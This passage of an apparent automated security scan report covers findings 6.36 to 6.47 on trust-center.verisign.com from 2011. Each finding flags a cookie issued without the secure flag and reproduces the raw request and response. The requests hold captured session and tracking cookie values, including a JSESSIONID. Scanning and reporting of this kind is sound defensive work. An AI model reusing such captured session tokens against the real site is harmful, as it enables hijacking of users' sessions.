Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46
...[SNIP]...

6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0.
...[SNIP]...

6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;

6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................

       ..................C.......    ..

.......................................................'...................................
...[SNIP]...

6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................

.....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG
...[SNIP]...

6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f.
...[SNIP]...

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
